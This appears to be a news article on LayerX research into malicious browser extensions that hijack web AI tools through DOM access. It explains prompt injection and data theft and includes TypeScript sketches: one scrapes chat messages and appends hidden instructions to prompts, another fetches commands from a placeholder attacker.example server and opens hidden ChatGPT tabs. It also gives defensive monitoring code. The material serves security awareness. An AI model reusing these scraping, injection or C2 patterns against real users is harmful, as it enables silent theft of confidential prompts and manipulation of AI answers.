Malicious Browser Extensions Exploit AI Prompts to Steal Sensitive Data
That seemingly harmless browser extension you installed could be weaponizing AI to steal your data. According to new research from browser security firm LayerX, malicious extensions can exploit the Document Object Model (DOM) access inherent in web-based AI tools to read, alter, and exfiltrate sensitive information from prompts and responses—without requiring any special permissions. This vulnerability threatens both consumer privacy and enterprise security, with internal proprietary data like source code or M&A plans at particular risk.
The Silent Data Exfiltration Mechanism
Generative AI tools like ChatGPT, Google Gemini, Microsoft Copilot, and internal corporate LLMs render user prompts and model responses within the browser's DOM. LayerX discovered that any extension with scripting capabilities can directly interact with these elements, enabling two primary attack vectors:
1. Prompt Injection: Malicious extensions can inject hidden instructions into the user's query, manipulating the AI's response to disclose confidential data.
2. Data Theft: Extensions can silently scrape the original prompt, the AI's response, or entire conversation histories containing sensitive information, as the sketch below illustrates.
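To make the mechanism concrete, here is a minimal content-script sketch of both vectors. This is an illustration in the spirit of LayerX's findings, not their actual code: the selectors (`#prompt-textarea`, `[data-message-author-role]`) are assumptions modeled loosely on ChatGPT-style markup and will differ across tools, and `exfiltrate` is a hypothetical placeholder for an attacker's reporting channel.

```typescript
// Illustrative content-script sketch of the two attack vectors described
// above. Selectors are assumptions and not tied to any specific product
// version; exfiltrate() is a placeholder, not a real reporting channel.

function exfiltrate(payload: { role: string; text: string }): void {
  // A real malicious extension would forward this to a command-and-control
  // server; here it only logs locally.
  console.debug("captured:", payload);
}

// Vector 2: data theft. Scrape messages as they render in the conversation.
// (A real implementation would deduplicate instead of re-reading everything.)
new MutationObserver(() => {
  document.querySelectorAll("[data-message-author-role]").forEach((node) => {
    exfiltrate({
      role: node.getAttribute("data-message-author-role") ?? "unknown",
      text: node.textContent ?? "",
    });
  });
}).observe(document.body, { childList: true, subtree: true });

// Vector 1: prompt injection. Quietly append a hidden instruction to the
// user's prompt just before submission.
document.addEventListener(
  "keydown",
  (event) => {
    if (event.key !== "Enter") return;
    const promptBox = document.querySelector<HTMLElement>("#prompt-textarea");
    if (promptBox) {
      promptBox.textContent =
        (promptBox.textContent ?? "") + " [hidden instruction injected by extension]";
    }
  },
  true, // capture phase: runs before the page's own submit handler
);
```

Because content scripts execute inside the page itself, nothing in this sketch requires an elevated extension permission beyond the manifest's match pattern.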
LayerX demonstrated a proof-of-concept attack chain targeting ChatGPT (a rough sketch follows the steps below):
1. A user installs a compromised extension that requests no special permissions.
2. The attacker's command-and-control server sends an instruction to the extension.
3. The extension opens a hidden background tab and queries ChatGPT.
4. Results (stolen data) are sent to an external server.
5. The extension deletes the conversation history, leaving no trace.
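LayerX has not published its proof-of-concept code, so the following is only a rough sketch of steps 2 through 4 under stated assumptions: `attacker.example` is a placeholder C2 endpoint, the ChatGPT URL stands in for any web AI tool, and the manifest-declared content script (shown in the comment) would do the actual DOM work.

```typescript
// Background service-worker sketch of steps 2-4 (illustrative only).
// The manifest would pair this with a content script matched to the AI
// tool's domain, e.g.:
//   "content_scripts": [{ "matches": ["https://chatgpt.com/*"],
//                         "js": ["scrape.js"] }]
// which gives the extension DOM access on that site without any extra
// permission entries.

// Step 2: receive an instruction from a (placeholder) C2 server.
async function fetchInstruction(): Promise<string> {
  const res = await fetch("https://attacker.example/instruction"); // placeholder
  return res.text();
}

// Step 3: open the AI tool in an inactive background tab. The matched
// content script is injected automatically, types the query into the DOM,
// and scrapes the response.
async function runHiddenQuery(): Promise<void> {
  const instruction = await fetchInstruction();
  const tab = await chrome.tabs.create({ url: "https://chatgpt.com/", active: false });
  // Step 4: the content script would relay scraped results back (e.g. via
  // chrome.runtime.sendMessage), and this worker would POST them to the
  // external server. Step 5, deleting the conversation, is driven through
  // the page's own delete controls. Both are omitted here.
  void instruction;
  void tab;
}
```

The point of the sketch is how little machinery is involved: every step uses ordinary extension plumbing rather than an exotic browser flaw.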
*How browser extensions can exploit AI to steal your data, and how to protect yourself. (Image: Elyse Betters Picaro / ZDNET)*
Enterprise Impact and Existing Vulnerabilities
The threat escalates in business environments. Employees copying regulated data or internal secrets into AI prompts create high-value targets. Compounding the risk, LayerX found that legitimate extensions such as Prompt Archer, Prompt Manager, and PromptFolder already possess the DOM access capabilities needed for such attacks, highlighting how easily this functionality can be repurposed maliciously. The researchers confirmed successful exploits against all top commercial LLMs, emphasizing that internal AI tools are equally vulnerable.
Building Defenses: From Chrome Enterprise to Vigilance
LayerX has collaborated with Google to integrate its extension risk scoring technology directly into Chrome for Enterprise. This solution analyzes permissions, publisher reputation, code behavior, and usage patterns to assign real-time risk scores, visible in enterprise management dashboards. IT admins can proactively block high-risk extensions.
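LayerX has not disclosed its scoring model, but as a purely illustrative sketch, a score combining the four factors named above might be a simple weighted sum; every weight, field name, and value below is invented for the example.

```typescript
// Toy illustration of multi-factor extension risk scoring. The factors
// mirror those named in the article; the weights and scale are invented.
interface ExtensionSignals {
  permissionBreadth: number;   // 0-1: how broad the requested permissions are
  publisherReputation: number; // 0-1: 1 = well-established publisher
  codeBehaviorRisk: number;    // 0-1: e.g. dynamic code loading, obfuscation
  usageAnomaly: number;        // 0-1: unusual install or usage patterns
}

function riskScore(s: ExtensionSignals): number {
  const score =
    0.35 * s.permissionBreadth +
    0.25 * (1 - s.publisherReputation) +
    0.25 * s.codeBehaviorRisk +
    0.15 * s.usageAnomaly;
  return Math.round(score * 100); // 0-100, higher = riskier
}

// Example: broad permissions from an unknown publisher scores high.
console.log(riskScore({
  permissionBreadth: 0.9,
  publisherReputation: 0.1,
  codeBehaviorRisk: 0.6,
  usageAnomaly: 0.3,
})); // ~74
```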
Key protective measures for organizations include:
* Monitor DOM interactions: Actively track listeners and webhooks that interact with AI prompts (see the sketch after this list).
* Apply dynamic sandboxing: Restrict extension capabilities based on real-time risk assessment, not just static allow lists.
* Leverage free tools: Use LayerX's ExtensionPedia database to evaluate the security of over 200,000 extensions across Chrome, Firefox, and Edge.
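As a simplified illustration of the first item, a monitoring script could instrument `addEventListener` and watch the prompt element for programmatic changes. The `#prompt-textarea` selector is again a placeholder, and a production monitor would report to a management backend rather than the console.

```typescript
// Simplified sketch of monitoring DOM interactions around an AI prompt box.
// "#prompt-textarea" is a placeholder selector; production monitoring would
// cover many tools and feed a management dashboard instead of the console.

// Flag any script that attaches listeners to the prompt element.
const originalAddEventListener = EventTarget.prototype.addEventListener;
EventTarget.prototype.addEventListener = function (
  this: EventTarget,
  type: string,
  listener: EventListenerOrEventListenerObject | null,
  options?: boolean | AddEventListenerOptions,
): void {
  if (this instanceof Element && this.matches("#prompt-textarea")) {
    console.warn(`listener of type "${type}" attached to the prompt box`);
  }
  originalAddEventListener.call(this, type, listener, options);
};

// Flag changes to the prompt area's content. User typing fires these too;
// a real monitor would correlate mutations with trusted input events to
// isolate script-driven edits.
const promptBox = document.querySelector("#prompt-textarea");
if (promptBox) {
  new MutationObserver((mutations) => {
    console.warn(`prompt box content changed (${mutations.length} mutation(s))`);
  }).observe(promptBox, { childList: true, characterData: true, subtree: true });
}
```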
For individual users, extreme caution when installing extensions remains paramount. This research underscores a critical convergence of AI adoption and browser extension risk, demanding heightened security awareness as generative tools become embedded in daily workflows. Because these attacks are silent and leave no logs, proactive defense is not just advisable but essential for safeguarding the integrity of human-AI interactions.